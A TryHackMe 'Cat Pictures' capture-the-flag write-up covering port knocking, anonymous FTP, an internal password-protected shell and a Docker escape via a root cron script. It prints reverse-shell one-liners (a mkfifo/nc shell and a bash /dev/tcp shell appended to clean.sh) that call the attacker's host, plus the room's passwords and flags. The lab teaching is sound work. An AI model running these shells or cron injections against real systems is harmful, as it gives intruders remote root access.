TryHackMe - Cat Pictures - Writeup

I made a forum where you can post cute cat pictures!

Nmap scan

root@ip-10-10-110-58:~# nmap -sCV -A 10.10.42.1 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-07 04:32 BST
Nmap scan report for ip-10-10-33-31.eu-west-1.compute.internal (10.10.42.1)
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
21/tcp   filtered ftp
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (EdDSA)
8080/tcp open     http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
MAC Address: 02:7B:89:FB:82:F3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/7%OT=22%CT=1%CU=36977%PV=Y%DS=1%DC=D%G=Y%M=027B89%TM
OS:=60BD9381%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=Z%CI=Z%TS=A)
OS:SEQ(SP=106%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M230
OS:1ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)W
OS:IN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F
OS:507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms ip-10-10-33-31.eu-west-1.compute.internal (10.10.42.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.49 seconds
root@ip-10-10-110-58:~# 

Port 8080 running on phpBB so I have to find Version of phpBB I searched for for finding version manually. Found http://10.10.42.1:8080/styles/prosilver/style.cfg

phpbb_version = 3.3.3

I found no vulnerability for this version of phpBB. I found a forum post in the forum Knock knock! Magic numbers: 1111, 2222, 3333, 4444

I thought, Is it indicating to knocking port with sequence (Number given in the forum post)? Learn More about port knocking.

So, I tried to to knocking port I run nmap scan once again the FTP port now open.

root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# nmap -sCV -A 10.10.42.1 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-07 19:09 BST
Nmap scan report for ip-10-10-42-1.eu-west-1.compute.internal (10.10.42.1)
Host is up (0.00044s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.169.134
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (EdDSA)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
MAC Address: 02:DF:0D:61:C5:0B (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/7%OT=21%CT=1%CU=36648%PV=Y%DS=1%DC=D%G=Y%M=02DF0D%TM
OS:=60BE60E7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)
OS:SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M230
OS:1ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)W
OS:IN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F
OS:507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms ip-10-10-42-1.eu-west-1.compute.internal (10.10.42.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.75 seconds
root@ip-10-10-169-134:~# 

Let’s try to login into FTP, found a file named note.txt

root@ip-10-10-169-134:~# ftp 10.10.42.1
Connected to 10.10.42.1.
220 (vsFTPd 3.0.3)
Name (10.10.42.1:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (48.1007 kB/s)
ftp> 

In the note.txt there is a port and password into it.

root@ip-10-10-169-134:~# cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is sardinethecat.
- catlover

Let’s try to connect 4420 port with netcat

nc 10.10.147.150 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted

There is a executable file named runme which I can’t run because of low level netcat based shell. I tried to spawing shell but didn’t work and finally I got I found OpenBSD reverse shell worked like charm.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.169.134 2222 >/tmp/f

run nc -nlvp 2222 on your host machine and run the reverse shell command in your target machine.

root@ip-10-10-169-134:~# nc -nlvp 2222
Listening on [0.0.0.0] (family 0, port 2222)
Connection from 10.10.42.1 34558 received!
/bin/sh: 0: can't access tty; job control turned off
# id      
/bin/sh: 1: id: not found
# uname
/bin/sh: 2: uname: not found
# 

Command like id, uname are disabled anyway lets try to run the file in the folder of /home/catlover/runme

root@ip-10-10-169-134:~# nc -nlvp 2222
Listening on [0.0.0.0] (family 0, port 2222)
Connection from 10.10.42.1 34560 received!
/bin/sh: 0: can't access tty; job control turned off
# /home/catlover/runme
Please enter yout password: sardinethecat
Access Denied
# 

This executable file denied the password sardinethecat. As I mentioned few executable of default command are disabled so I could not able to use strings instead of the string I used cat command if I can get information from the executable file.

\ufffd\ufffd\ufffdH\ufffd\ufffdt1\ufffd\ufffdL\ufffd\ufffdL\ufffd\ufffdD\ufffd\ufffdA\ufffd\ufffdH\ufffd\ufffdH9\ufffdu\ufffdH\ufffd[]A\A]A^A_\ufffdff.\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdH\ufffdH\ufffd\ufffdrebeccaPlease enter yout password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkeyAccess Denied;d

The password is before the Please string rebecca

# ./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued!

I think it will generate SSH key after 2-3 second I saw id_rsa in the /home/catlover directory.

# ls -la
total 32
drwxr-xr-x 2 0 0  4096 Jun  7 19:03 .
drwxr-xr-x 3 0 0  4096 Apr  2 20:51 ..
-rw-r--r-- 1 0 0  1675 Jun  7 19:03 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3 01:35 runme

Let’s copy the private key and create a file in your host machine and run command, make sure you set the id_rsa permission to 600

root@ip-10-10-169-134:~# chmod 600 id_rsa
root@ip-10-10-169-134:~# ssh -i id_rsa catlover@10.10.42.1
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/# 

Got the first flag from the root directory

root@7546fa2336d6:/# id
uid=0(root) gid=0(root) groups=0(root)
root@7546fa2336d6:/root# pwd
/root
root@7546fa2336d6:/root# cat flag.txt
7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9

Very first think I try for escalate privilege for checking sudo -l but for this machine there no sudo command available.

It seems we are in docker container because we got root first. From previous experience on Internal machine, It was same as this one and Internal machine was turned out that it was docker container. From a medium blog post Learn more: User privileges in Docker containers

By default, Docker containers run as root.

Found a .bash_history file in the root directory

root@7546fa2336d6:/# ls -la
total 108
drwxr-xr-x   1 root root 4096 Mar 25 16:18 .
drwxr-xr-x   1 root root 4096 Mar 25 16:18 ..
-rw-------   1 root root  588 Jun  4 23:39 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25 16:08 .dockerenv
drwxr-xr-x   1 root root 4096 Apr  9 22:26 bin
drwxr-xr-x   3 root root 4096 Mar 24 04:38 bitnami
drwxr-xr-x   2 root root 4096 Jan 30 17:37 boot
drwxr-xr-x   5 root root  340 Jun  7 16:38 dev
drwxr-xr-x   1 root root 4096 Apr  9 22:26 etc
drwxr-xr-x   2 root root 4096 Jan 30 17:37 home
drwxr-xr-x   1 root root 4096 Sep 25  2017 lib
drwxr-xr-x   2 root root 4096 Feb 18 11:59 lib64
drwxr-xr-x   2 root root 4096 Feb 18 11:59 media
drwxr-xr-x   2 root root 4096 Feb 18 11:59 mnt
drwxrwxr-x   1 root root 4096 Mar 25 16:08 opt
drwxrwxr-x   2 root root 4096 Mar 24 04:37 post-init.d
-rwxrwxr-x   1 root root  796 Mar 24 04:37 post-init.sh
dr-xr-xr-x 127 root root    0 Jun  7 16:38 proc
drwx------   1 root root 4096 Mar 25 16:28 root
drwxr-xr-x   4 root root 4096 Feb 18 11:59 run
drwxr-xr-x   1 root root 4096 Apr  9 22:26 sbin
drwxr-xr-x   2 root root 4096 Feb 18 11:59 srv
dr-xr-xr-x  13 root root    0 Jun  7 16:38 sys
drwxrwxrwt   1 root root 4096 Jun  7 16:39 tmp
drwxrwxr-x   1 root root 4096 Mar 24 04:37 usr
drwxr-xr-x   1 root root 4096 Feb 18 11:59 var
root@7546fa2336d6:/# 

.bash_history contain

root@7546fa2336d6:/# cat .bash_history
exit
exit
exit
exit
exit
exit
exit
ip a
ifconfig
apt install ifconfig
ip
exit
nano /opt/clean/clean.sh 
ping 192.168.4.20
apt install ping
apt update
apt install ping
apt install iptuils-ping
apt install iputils-ping
exit
ls
cat /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
clear
cat /etc/crontab
ls -alt /
cat /post-init.sh 
cat /opt/clean/clean.sh 
bash -i >&/dev/tcp/192.168.4.20/4444 <&1
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
cat /var/log/dpkg.log 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
exit
exit
exit
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash

rm -rf /tmp/*
root@7546fa2336d6:/# 

From this command it seems like that some crojob running but I could able cat crontab command to see which is corjob. So, our target to make sure that this cronjob actually working.

Enter this reverse shell into the /opt/clean/clean.sh and use nc -nlvp 1234 in your host machine and wait.

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.169.134/1234 0>&1'" >> clean.sh

After few time it executed and got root once again and got the root flag.

root@ip-10-10-169-134:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.42.1 35448 received!
bash: cannot set terminal process group (5261): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# whoami
whoami
root
root@cat-pictures:~# cat /root/root.txt
cat /root/root.txt
Congrats!!!
Here is your flag:

4a98e43d78bab283938a06f38d2ca3a3c53f0476
root@cat-pictures:~# 

Thanks for reading

Room Cat Pictures

Written on June 7, 2021